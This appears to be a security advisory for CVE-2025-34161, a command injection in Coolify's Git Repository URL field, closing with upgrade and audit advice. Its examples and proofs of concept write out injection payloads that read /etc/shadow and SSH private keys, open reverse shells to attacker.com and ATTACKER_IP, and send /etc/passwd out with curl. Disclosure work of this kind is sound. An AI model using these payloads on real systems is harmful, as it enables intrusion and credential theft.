CVE-2025-34161: Coolify Git Repository Command Injection RCE
#

Vulnerability Overview
#

Field	Value
CVE ID	CVE-2025-34161
Affected	Coolify ≤ v4.0.0-beta.420.6
Fixed in	v4.0.0-beta.420.7
Severity	Critical
CVSS 4.0	CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWE	CWE-78 (OS Command Injection)

Summary
#

Coolify versions prior to and including v4.0.0-beta.420.6 are vulnerable to a critical remote code execution (RCE) flaw in the project deployment workflow. The platform allows authenticated users, with low-level privileges, to inject arbitrary shell commands via the Git Repository URL field during project creation. By submitting a crafted repository string containing command injection syntax, an attacker can execute arbitrary commands on the underlying host system, resulting in full server compromise.

Impact
#

Remote Code Execution (RCE) - Arbitrary command execution on the host
Privilege Escalation - From low-level user to full host compromise
Complete Loss of Confidentiality, Integrity, and Availability - Full system compromise

Technical Details
#

Vulnerability Description
#

The Git Repository field in Coolify’s application configuration does not properly sanitize or validate input before executing shell commands. An authenticated low-privileged user can inject arbitrary shell commands that will be executed with the privileges of the Coolify application.

Attack Vector
#

# Attacker crafts malicious Git Repository URL
[email protected]:fake/repo.git; cat /etc/passwd #

# System executes both commands:
git clone "[email protected]:fake/repo.git"
cat /etc/passwd

Command Injection Examples
#

# Information Disclosure
https://github.com/user/repo.git; whoami; id; uname -a #

# File Access
https://github.com/user/repo.git; cat /etc/shadow #

# Reverse Shell
https://github.com/user/repo.git; bash -i >& /dev/tcp/attacker.com/4444 0>&1 #

# Data Exfiltration
https://github.com/user/repo.git; curl http://attacker.com/exfil?data=$(cat /etc/passwd|base64) #

Steps to Reproduce
#

Login as a low-privileged user
Create a new project
Select “Private GIT” option
Insert a malicious payload in the Git Repository URL field:
```
[email protected]:fake/repo.git; cat /etc/passwd #
```
Deploy the project
Observe arbitrary command execution in the deployment logs

Proof of Concept
#

PoC 1: Information Disclosure
#

Repository URL: https://github.com/user/repo.git; whoami; id; hostname #
Expected Result: Output showing username, user ID, and hostname

PoC 2: File Access
#

Repository URL: [email protected]:fake/repo.git; cat /root/.ssh/id_rsa #
Expected Result: SSH private key displayed in deployment logs

PoC 3: Reverse Shell
#

Repository URL: https://github.com/user/repo.git; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 #
Expected Result: Interactive shell access to the host system

Mitigation
#

Immediate Actions
#

Upgrade immediately to Coolify v4.0.0-beta.420.7 or later
Review existing projects for suspicious repository configurations
Audit deployment logs for suspicious command patterns
Review user permissions and audit user activities

CVE-2025-34161: Coolify Git Repository Command Injection RCE #

Vulnerability Overview #

Summary #

Impact #

Technical Details #

Vulnerability Description #

Attack Vector #

Command Injection Examples #

Steps to Reproduce #

Proof of Concept #

PoC 1: Information Disclosure #

PoC 2: File Access #

PoC 3: Reverse Shell #

Mitigation #

Immediate Actions #

References #